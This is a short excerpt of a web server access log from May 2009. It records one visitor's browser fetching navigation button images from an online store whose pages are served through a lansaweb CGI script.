75.56.214.231 - - [20/May/2009:00:16:08 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
75.56.214.231 - - [20/May/2009:00:16:09 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
75.56.214.231 - - [20/May/2009:00:16:09 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
75.56.214.231 - - [20/May/2009:00:16:09 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
75.56.214.231 - - [20/May/2009:00:16:09 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
75.56.214.231 - - [20/May/2009:00:16:09 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
75.56.214.231 - - [20/May/2009:00:16:09 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
75.56.214.231 - - [20/May/2009:00:16:10 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
